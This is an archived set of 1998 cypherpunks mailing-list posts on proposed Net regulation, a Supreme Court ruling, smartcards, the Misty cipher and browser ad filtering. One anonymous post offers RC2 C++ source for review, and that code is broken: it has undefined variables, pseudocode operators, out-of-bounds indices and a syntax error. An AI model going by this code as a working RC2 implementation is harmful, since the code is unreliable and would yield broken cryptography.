Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Thu, 22 Jan 1998 12:41:49 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Gore Commission wants to regulate the Net like broadcast
In-Reply-To: <Pine.LNX.3.95.980120163439.4246A-100000@vorlon.mit.edu>
Message-ID: <v0311075fb0ec7aa78162@[207.94.249.133]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:30 PM -0800 1/21/98, Tim May wrote:
>At 1:34 PM -0800 1/20/98, Declan McCullagh wrote:
>>Date: Tue, 20 Jan 1998 16:20:23 -0500
>>From: Alan Moseley <amoseley@clark.net>
>>To: declan@well.com
>>Subject: the Gore Commission and digital media
>>
>>The Gore Commission -- the group created by Clinton to determine the
>>future public interest obligations of digital TV broadcasters -- showed
>>signs last week of broadening its reach to include other digital media
>>that can deliver broadcast-like audio and video.
>>...
>>	The recent experience of the Communications Decency Act
>>demonstrates the government's willingness to control digital speech.  The
                                //eagerness
>>digital convergence argument could be a  new rationale for further such
>>interventions, Maines warned.
>
>Just because the Internet can deliver audio and video signals is hardly a
>matter of "allocating scarce resources." Video rental stores can also
>deliver video signals, but there is no (well, modulo the "obscenity" laws
>in various communities) regulation of these sources.

Presumably they intend to also regulate live theater.  It can also deliver
audio and video.  FUBAR.


-------------------------------------------------------------------------
Bill Frantz       |                            | Periwinkle -- Consulting
(408)356-8506     | All politicians should ski.| 16345 Englewood Ave.
frantz@netcom.com |                            | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 22 Jan 1998 13:27:07 +0800
To: Declan McCullagh <cypherpunks@cyberpass.net
Subject: Re: Will bureaucrats turn the Net into TV? Note from FCC
In-Reply-To: <Pine.GSO.3.95.980121160005.2838D-100000@well.com>
Message-ID: <v03102800b0ec87778071@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:02 PM -0800 1/21/98, Declan McCullagh wrote:
>A note from an acquaintance formerly at the FCC. --Declan
>
>
>---------- Forwarded message ----------
>
>Having spedt my years at the FCC doing pre-repeal Fairness Doctrine and
>Sec. 315 equal time matters, I think [deleted-dm]'s concerns, tho'
>justified politically [because most adminsitrations will leave no good
>technology unhobbled] are without substantial legal basis.
>
>The hook for the Fairness Doctrine obligation imposed on broadcasters as a
>corollary to their statutory 'public interest' obligations was as a
>licensee of scarce broadcast spectrum--a discrete frequency awarded on a
>putatively compettive basis.

Hey, this is what _I_ said.

>Those key elements[scarcity/license/obligation] are--for now--lacking in
>the on-line environment.  And while no doubt this or another

Yep, this was what I was saying.

>Administration, or wiley Congressional staffer could gin up a plausable
>nexus between the web and interstate commerce, sufficiient to sustain a
>new public interest obligation, I think we're two or three generations of
>bandwith scarcity away from that becoming a compelling element of a
>cyber-resource allocation scheme.

"Regulation of commerce" (which was, let us not forget, *interstate*
commerce, despite the recent extension into defining cloning as commerce,
growing peanuts as commerce, and painting pictures as commerce, etc.) is a
fundamentally different issue than allocation of scarce bandwidth.

Though Declan's source may be right that the burrowcrats will try to find a
reason to stick their fingers into the Net to regulate it (meaning,
rent-seeking), it won't be via the FCC. That will not fly.

I doubt that even President Gore will have the time this coming summer to
push for such foolish legislation.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Thu, 22 Jan 1998 14:18:44 +0800
To: Steve Schear <schear@lvdi.net>
Subject: Re: Intel introduces new compression technology for surfers   [CNN]
In-Reply-To: <3.0.5.32.19980121091153.034e0100@clueserver.org>
Message-ID: <3.0.5.32.19980121220518.03c31580@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 03:46 PM 1/21/98 -0800, Steve Schear wrote:

>Maybe they dynamically turn off the modem compression feature at both ends
during an image download.  LZW-like compression actually adds overhead to
files which are non-text based.

How do they do that from the server side?

---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Thu, 22 Jan 1998 15:04:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Gore Commission wants to regulate the Net like broadcast
In-Reply-To: <Pine.LNX.3.95.980120163439.4246A-100000@vorlon.mit.edu>
Message-ID: <v03102800b0ec84e6fcb8@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:30 PM -0800 1/21/98, Tim May wrote:
>I was always of the understanding that the mandate for regulation of radio
>and television broadcasts had to do centrally with the "allocation of
>scarce resources." That is, that because there are only a finite number of
>non-overlapping spectrum slots, some degree of regulation or allocation is
>justified.
>
That was the government's justification.

>
>The Internet is not constrained by a finite number of slots...capacity can
>be added arbitrarily (well, at least for as many decades out as we can
>imagine). And consumers can, and do, pick what they choose to download or
>connect to.
>
>The Internet is about pure speech, about publishing.  For the Gore
>Commission to even _hint_ at regulating it is reprehensible.

The measures being discussed at are clearly not in the interests of the public but of the continued maintenance of the state's priviledged position to influence or limit speech, information flow and public opinion.  The Feds cannot easily control millions of citizens directly and therefore need to create a franchise, like broadcast, whose licensees will bend to retain their priviledges.  

This paradigm is the same as for crypto. Since their goal is to limit access to crypto (which is most likely to find widespread acceptance only after seemless integration with common products ) and the Feds find it more difficult to control individual (e.g., cypherpunk) efforts, EAR enforcement is geared to corporations and congressional debate is steered to jobs, corporate profits and competitiveness.  To the extent that civil liberties issues are raised the national security trump card is played.

These attempts at regulation show just how terrified they are of true free speech and every man a publisher.

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 22 Jan 1998 15:03:59 +0800
To: "William H. Geiger III" <cypherpunks@einstein.ssz.com
Subject: Re: Misty???
In-Reply-To: <199801220634.BAA28888@users.invweb.net>
Message-ID: <v03102801b0ec9df81dd5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:08 PM -0800 1/21/98, William H. Geiger III wrote:

>Well on another mailing list I have been chastised for calling Misty
>"snake-oil".
>
>Has anyone actually examined this algorithm? Seems there is an IETF Draft
>on it (draft-ohta-misty1desc-00.txt).
>
>Any opinions on it?? My only exposure has be through the pidgon-english
>posts of Nobuki Nakatuji (if it looks like a duck, it smells like a duck,
>it quacks like a duck ....).

I wouldn't call Misty "snake oil." But it's also been thoroughly taken
apart and shown to be weak. Importantly, it was submitted by Mitsubishi for
peer review.

"Snake oil" is a name I reserve for, well, snake oil. Some of the recent
nonsense we've seen is more snake oilish than Misty was.

Of course, there should be no real interest in Misty anymore, except as an
example to study, so anyone trying to promote it might be accused of
peddling snake oil.

As for Nobuki-san's consistently strange posts, I'm now persuaded he may be
a troller. Or just not very bright.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 22 Jan 1998 15:45:57 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Gore Commission wants to regulate the Net like broadcast
In-Reply-To: <v03102800b0ec097cf8e5@[207.167.93.63]>
Message-ID: <v03102802b0eca2f84a96@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:35 PM -0800 1/21/98, Steve Schear wrote:

>The measures being discussed at are clearly not in the interests of the
>public but of the continued maintenance of the state's priviledged
>position to influence or limit speech, information flow and public
>opinion.  The Feds cannot easily control millions of citizens directly and
>therefore need to create a franchise, like broadcast, whose licensees will
>bend to retain their priviledges.
>
>This paradigm is the same as for crypto. Since their goal is to limit
>access to crypto (which is most likely to find widespread acceptance only
>after seemless integration with common products ) and the Feds find it
>more difficult to control individual (e.g., cypherpunk) efforts, EAR
>enforcement is geared to corporations and congressional debate is steered
>to jobs, corporate profits and competitiveness.  To the extent that civil
>liberties issues are raised the national security trump card is played.
>
>These attempts at regulation show just how terrified they are of true free
>speech and every man a publisher.

Yes, they need "choke points" to control the anarchy.

As with the British plan to license a series of "certificate authorities,"
or U.S. plans/wishes to do the same thing, this effectively forces all
citizen-units to sign up with one of the authorized certificate issuers.
(This is why certificate-based systems are so heinous.)

We're seeing the pieces being put together in various ways. The new
Copyright law, which felonizes even minor infringements, is one piece. The
laws making it illegal to disparage food products is another. The proposed
"no anonymous speech" notions are another.

As with prison "trustees," or as with the forced deputizing of corporations
as soldiers in the War on Drugs, we are seeing "overlords" or "sheriffs"
being appointed/annointed to control their unruly underlings.

Which leaves unruly Cypherpunks still running free.

(Which is why I would look for signs that Congress will seek to make ISPs
responsible for political speech, a la the Chinese actions. Not this year,
not next, but someday. Except it won't be explicitly a law about political
speech, it'll be something about dangerous information, safety of the
children, etc.)

--Tim May



The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 22 Jan 1998 13:39:34 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: SC rules 1st doesn't cover lies [CNN]
In-Reply-To: <v03007801b0ec7f42436a@[168.161.105.216]>
Message-ID: <199801220551.AAA28381@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v03007801b0ec7f42436a@[168.161.105.216]>, on 01/21/98 
   at 11:47 PM, Declan McCullagh <declan@well.com> said:

>[1] Unless it's a copyrighted work; if it is, you'll go to federal prison
>and be fined a quarter-mil. Thanks, Bill Gates and the Software
>Publishers Association.

Perhaps we could convince Sun to press for *criminal* charges against Bill
Gates as part of thier current battle over Java.

I think it would only be fitting to set the tables turned against these
SOB's.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: Dos: Venerable.  Windows: Vulnerable.  OS/2: Viable.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNMbMgo9Co1n+aLhhAQHbQAQAuhbHqJhZSAUucxdwnKHu4s312Vd5+H0r
p4rsCn36HoWdqaPReGsjcZUV7Y5VTKCLjBV2vkfAmkT40cZwgwhoAXwusVLjWIB5
b0xZYFndb0+CqasFCtZ/UqZiW6CkfwZpZAD3yox0qC6S2nLSCmwgopgojTS5F6is
GXlMiVNy/14=
=xzJJ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 22 Jan 1998 13:39:48 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: SC rules 1st doesn't cover lies [CNN] (fwd)
Message-ID: <199801220536.XAA06214@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 21 Jan 1998 23:47:05 -0500
> From: Declan McCullagh <declan@well.com>
> Subject: Re: SC rules 1st doesn't cover lies [CNN]
> Reply-To: austin-cpunks@ssz.com
> 
> Clarification on the Subject: line -- the court's ruling, at least as
> described below, applies only to government employees. It is the
> state-as-employer, not the state-as-sovereign, role the court is discussing.
> 
> In other words, we're still free to lie, cheat, and steal[1].

> >>      "A citizen may decline to answer the question, or answer it
> >>      honestly, but he cannot with impunity knowingly and willfully answer
> >>      with a falsehood," Rehnquist said.

So you have to be an employee of the government to be a citizen?


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 22 Jan 1998 13:51:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re:  Latest smartcard software
In-Reply-To: <dc8a95a3add1ece5371ae8fb4a3c6036@squirrel>
Message-ID: <199801220604.BAA28541@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <dc8a95a3add1ece5371ae8fb4a3c6036@squirrel>, on 01/22/98 
   at 03:53 AM, Secret Squirrel <anon@squirrel.owl.de> said:


>>They'll say hey, you've already surrendered your biometric number
>>during fingerprinting for driver's licenses.
>>
>>It will be too late.
>>
>>The high-tech American Leviathan will be in place.

>Sounds like Microsoft. No, really. I'm dead serious.

>Like it or not, people have to use Mickeysoft crap sooner or later. Want
>to read that document? Read that email? Run that program? Purchase things
>(software which runs)? It's garbage. I know it's garbage. Many of us here
> know it's garbage. But we have to use it anyway. Compare this to the 
>smartcard as proposed like this:

>I know it's garbage. Many of us here know it's garbage. But we have to
>use it anyway. Want to read that document? Read that email? Access that
>computer system? Drive your car? Get in your house? Get through a toll
>booth? Enter or leave the country? Better make sure your papers are in
>order.

>The high-tech American Leviathan is already in place. The problem is that
>it'll just get worse because the sheeple are, by definition, naked,
>stupid, and blind.

This is, well what can I say but, BULL.

This is the typical line one gets from the sheeple, "I don't like MS but I
am *forced* to use it", or "I don't like Credit Cards but I can't live
without them".

Life sucks deal with it. You have two choices: either use it or don't but
quit your whining.

I will not use a dumbcard today, tomorrow, or ever (I have never owned a
CC).

The herd will always be the herd but if you follow along are you really
any different?

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: When DOS grows up it wants to be OS/2!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNMbPfI9Co1n+aLhhAQGoOwP+PbgtKvM52fHDUUIhFlHm89s801Pcpo9d
gihoEKJKPqDfhllsJunIMUXT92S+bYSBrRDQpbnPHtbiuBW/XMIBEKtIbWpO77ya
TnZIvATMpTZwUIIMBAQOCpRUgsVdPGMJf36Jwq6Pf2ItfBsCeja8QHixxJebz+Bf
cVYddd0jhuw=
=XC2k
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Thu, 22 Jan 1998 13:51:20 +0800
To: devnull@www.video-collage.com
Subject: Re: Revenge on the Nerds  -Maureen on a rampage
In-Reply-To: <B9PoJe20w165w@bwalk.dm.com>
Message-ID: <199801220537.XAA00871@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Dr.Dimitri Vulis KOTM wrote:
> Speaking of browsers: I'd rather *pay* for a browser that has such an obvious
> feature as a list of URL regexps that you don't want to browse. Neither IE
> nor Netscape has it. I don't know about Lynx.  I'm now using junkbuster
> from www.junkbuster.com (highly recommended) to filter out ads and banners
> and cookies. I generally think WWW sucks; but if I use it, I want to be able
> to tell the browser that if the page tried to load an image from a URL
> that looks like
> 
> valueclick.com
> bannermall.com
> adforce.*.com/
> bannerweb.com
> eads.com/
> /*/sponsors/*.gif
> *banner*.gif
> /image/ads/
> 
> etc etc, I want the browse to ignore this request. Clearly Microsoft and
> Netscape both don't give a damn about the desires of their NON-PAYING users
> and would rather bend over for the advertisers.

I suggest writing a proxy server that does such filtering, running it on 
the local machine, and using it as proxy server from your netscape browser.

There is a proxy server in form of a 20 line perl script, you
can take it and modify it.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 22 Jan 1998 13:25:35 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: SC rules 1st doesn't cover lies [CNN]
In-Reply-To: <199801212040.OAA03251@einstein.ssz.com>
Message-ID: <v03007801b0ec7f42436a@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



Clarification on the Subject: line -- the court's ruling, at least as
described below, applies only to government employees. It is the
state-as-employer, not the state-as-sovereign, role the court is discussing.

In other words, we're still free to lie, cheat, and steal[1].

-Declan

[1] Unless it's a copyrighted work; if it is, you'll go to federal prison
and be fined a quarter-mil. Thanks, Bill Gates and the Software Publishers
Association.


At 14:40 -0600 1/21/98, Jim Choate wrote:
>Forwarded message:
>
>>
>>          SUPREME COURT: GOVERNMENT AGENCIES CAN PUNISH WORKERS WHO LIE
>>
>>      January 21, 1998
>>      Web posted at: 2:53 p.m. EST (1953 GMT)
>>
>>      WASHINGTON (AP) -- Government agencies can punish employees who lie
>>      while being investigated for employment-related misconduct, the
>>      Supreme Court ruled unanimously Wednesday.
>>
>>      The court overturned rulings in five separate cases that had barred
>>      federal agencies from stiffening the disciplinary action taken
>>      against wayward employees based on false statements they made when
>>      questioned about their misconduct.
>>
>>      Although the decision dealt with federal employees, its rationale
>>      appeared to affect state and local government employees as well.
>>      Chief Justice William H. Rehnquist wrote for the court that nothing
>>      in the Constitution nor any federal law bars such punishment.
>>
>>      "A citizen may decline to answer the question, or answer it
>>      honestly, but he cannot with impunity knowingly and willfully answer
>>      with a falsehood," Rehnquist said.
>
>
>    ____________________________________________________________________
>   |                                                                    |
>   |       The most powerful passion in life is not love or hate,       |
>   |       but the desire to edit somebody elses words.                 |
>   |                                                                    |
>   |                                  Sign in Ed Barsis' office         |
>   |                                                                    |
>   |            _____                             The Armadillo Group   |
>   |         ,::////;::-.                           Austin, Tx. USA     |
>   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
>   |      .',  ||||    `/( e\                                           |
>   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
>   |                                                 ravage@ssz.com     |
>   |                                                  512-451-7087      |
>   |____________________________________________________________________|







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 22 Jan 1998 14:05:12 +0800
To: ichudov@Algebra.COM (Igor Chudov @ home)
Subject: Re: Revenge on the Nerds  -Maureen on a rampage
In-Reply-To: <199801220537.XAA00871@manifold.algebra.com>
Message-ID: <199801220610.BAA28611@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199801220537.XAA00871@manifold.algebra.com>, on 01/21/98 
   at 11:37 PM, ichudov@algebra.com (Igor Chudov @ home) said:

>Dr.Dimitri Vulis KOTM wrote:
>> Speaking of browsers: I'd rather *pay* for a browser that has such an obvious
>> feature as a list of URL regexps that you don't want to browse. Neither IE
>> nor Netscape has it. I don't know about Lynx.  I'm now using junkbuster
>> from www.junkbuster.com (highly recommended) to filter out ads and banners
>> and cookies. I generally think WWW sucks; but if I use it, I want to be able
>> to tell the browser that if the page tried to load an image from a URL
>> that looks like
>> 
>> valueclick.com
>> bannermall.com
>> adforce.*.com/
>> bannerweb.com
>> eads.com/
>> /*/sponsors/*.gif
>> *banner*.gif
>> /image/ads/
>> 
>> etc etc, I want the browse to ignore this request. Clearly Microsoft and
>> Netscape both don't give a damn about the desires of their NON-PAYING users
>> and would rather bend over for the advertisers.

>I suggest writing a proxy server that does such filtering, running it on 
>the local machine, and using it as proxy server from your netscape
>browser.

>There is a proxy server in form of a 20 line perl script, you can take it
>and modify it.

I *highly* recomed taking a look at: http://www.anybrowser.org/campaign/

If I can't view a website using Lynx 99.9% of the time it's not worth the
effort of the DL.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: What I like about MS is its loyalty to customers!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNMbQ249Co1n+aLhhAQG4cgQAo3bldsA3mgaQucL7qh06bkdHfbszEhix
PJzuYpRwMyfwpaW51PHGB6dBbhtUnaenifQUtv9lCqxcXibArXprIaT1ZKAHxG32
dxcUvzx7gIdbgQ67e3xyaTfxALdVqD+MCd5+aoBebiPM8aA38Y6SJctdGOJJOkW5
VgjfceZDnzI=
=Rpgw
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Thu, 22 Jan 1998 13:15:57 +0800
To: cypherpunks@toad.com
Subject: tell me what you think of this RC2 C++ source code
Message-ID: <7f7f70c39f30fd17d32c41b5bddb97b3@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain




tell me what you think of this RC2 C++ source code

#include <string.h>
#include <assert.h>

void RC2Keyschedule::schedule( unsigned short K[64], const unsigned char L[128], unsigned T8, unsigned TM )

	{
	unsigned char x;
	unsigned i;

	static const unsigned char PITABLE[256] = {
	    217,120,249,196, 25,221,181,237, 40,233,253,121, 74,160,216,157,
	    198,126, 55,131, 43,118, 83,142, 98, 76,100,136, 68,139,251,162,
	     23,154, 89,245,135,179, 79, 19, 97, 69,109,141,  9,129,125, 50,
	    189,143, 64,235,134,183,123, 11,240,149, 33, 34, 92,107, 78,130,
	     84,214,101,147,206, 96,178, 28,115, 86,192, 20,167,140,241,220,
	     18,117,202, 31, 59,190,228,209, 66, 61,212, 48,163, 60,182, 38,
	    111,191, 14,218, 70,105,  7, 87, 39,242, 29,155,188,148, 67,  3,
	    248, 17,199,246,144,239, 62,231,  6,195,213, 47,200,102, 30,215,
	      8,232,234,222,128, 82,238,247,132,170,114,172, 53, 77,106, 42,
	    150, 26,210,113, 90, 21, 73,116, 75,159,208, 94,  4, 24,164,236,
	    194,224, 65,110, 15, 81,203,204, 36,145,175, 80,161,244,112, 57,
	    153,124, 58,133, 35,184,180,122,252,  2, 54, 91, 37, 85,151, 49,
	     45, 93,250,152,227,138,146,174,  5,223, 41, 16,103,108,186,201,
	    211,  0,230,207,225,158,168, 44, 99, 22,  1, 63, 88,226,137,169,
	     13, 56, 52, 27,171, 51,255,176,187, 72, 12, 95,185,177,205, 46,
	    197,243,219, 71,229,165,156,119, 10,166, 32,104,254,127,193,173
	};

	assert(len > 0 && len <= 128);
	assert(bits <= 1024);
	if (!bits)
		bits = 1024;

	memcpy(xkey, key, len);
	
	for (i = 0; i < 128; i++) {
                L[i] = PITABLE[L[i-1] + L[i-T]];
	}
	
        T8 = (T1+7) >> 3;
        TM = 255 MOD 2^(8 + T1 - 8*T8);

        L[128-T8] = PITABLE[L[128-T8] & TM];

	for (i = 0; i < 127-T8; i++) {
                L[i] = PITABLE[L[i+1] XOR L[i+T8]];
	};

	i = 63;
	
        K[i] = L[2*i] + 256*L[2*i+1];
	};

void RC2Encryption::ProcessBlock( const unsigned short K[64], )
	{
	unsigned R3, R2, R1, R0, i;

	for (i = 0; i < 16; i++) {
		R0 += (R1 & ~R3) + (R2 & R3) + K[4*i+0];
		R0 = R0 << 1;
		
		R1 += (R2 & ~R0) + (R3 & R0) + K[4*i+1];
		R1 = R1 << 2;

		R2 += (R3 & ~R1) + (R0 & R1) + K[4*i+2];
		R2 = R2 << 3;

		R3 += (R0 & ~R2) + (R1 & R2) + K[4*i+3];
		R3 = R3 << 5;

		if (i == 4 || i == 10) {
			R0 += K[R3 & 63];
			R1 += K[R0 & 63];
			R2 += K[R1 & 63];
			R3 += K[R2 & 63];
		}
	}

void RC2Decryption::ProcessBlock( const unsigned short K[64], )
	{
	unsigned R3, R2, R1, R0, i;

	for (i = 0; i < 16; i++) {
		R3 = R3 << 5;
		R3 += (R0 & ~R2) + (R1 & R2) + K[4*i-3];

		R2 = R2 << 3;
		R2 += (R3 & ~R1) + (R0 & R1) + K[4*i-2];

		R1 = R1 << 2;
		R1 += (R2 & ~R0) + (R3 & R0) + K[4*i-1];

		R0 = R0 << 1;
		R0 += (R1 & ~R3) + (R2 & R3) + K[4*i-0];

		if (i == 4 || i == 10) {
			R3 -= K[R2 & 63];
			R2 -= KR1 & 63];
			R1 -= K[R0 & 63];
			R0 -= K[R3 & 63];
		}
	}








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 22 Jan 1998 14:20:11 +0800
To: cypherpunks@einstein.ssz.com
Subject: Misty???
Message-ID: <199801220634.BAA28888@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Well on another mailing list I have been chastised for calling Misty
"snake-oil".

Has anyone actually examined this algorithm? Seems there is an IETF Draft
on it (draft-ohta-misty1desc-00.txt).

Any opinions on it?? My only exposure has be through the pidgon-english
posts of Nobuki Nakatuji (if it looks like a duck, it smells like a duck,
it quacks like a duck ....).

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: I use OS/2 2.0 and I don't care who knows!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNMbWgY9Co1n+aLhhAQFjoQQAgRac4gm3MM1mbZUfb0jH21b7gQt1IRYR
wWFilIA2am/6x+bmF3RKG64A9/iwp00rD45g2yybw91Gg3/87nEMjPBpo+DCchtb
psYRKyDOTxOAr7GljOa2k4HJAfNDqjxQ56sI/4whk2PEADnpHilzln98tEJobZA7
oxZw9FeGlig=
=M0fT
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 22 Jan 1998 14:33:46 +0800
To: Alan Olsen <alan@clueserver.org>
Subject: Re: Intel introduces new compression technology for surfers   [CNN]
In-Reply-To: <3.0.5.32.19980121220518.03c31580@clueserver.org>
Message-ID: <199801220647.BAA29020@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.5.32.19980121220518.03c31580@clueserver.org>, on 01/21/98 
   at 10:05 PM, Alan Olsen <alan@clueserver.org> said:

>>Maybe they dynamically turn off the modem compression feature at both ends
>during an image download.  LZW-like compression actually adds overhead to
>files which are non-text based.

>How do they do that from the server side?

If someone can fuck with my modem settings over the "net" I will be
placing a call to Boeing (formaly USR) first thing to see what they are
going to do to fix it.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: This marks Logical End-Of-Message. Physical EOM follows

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNMbZnY9Co1n+aLhhAQH7EQP/c1j6peXFu2Tf2Dk7gkA3NUtS7dkXMgAL
ddUQ9OIp1t3vfuo1ywaX/cB7IuIc8HaJU1FbKCHMLtJaM5e5me/wNuAtD7cIJm9Y
umsMEwhRnbcAH0TUZFJMJwEmbDk2QArrdMK1e4gXc82+XCQA96nNwYhXvg/4N9NA
wtL7+DqwyU8=
=5c26
-----END PGP SIGNATURE-----





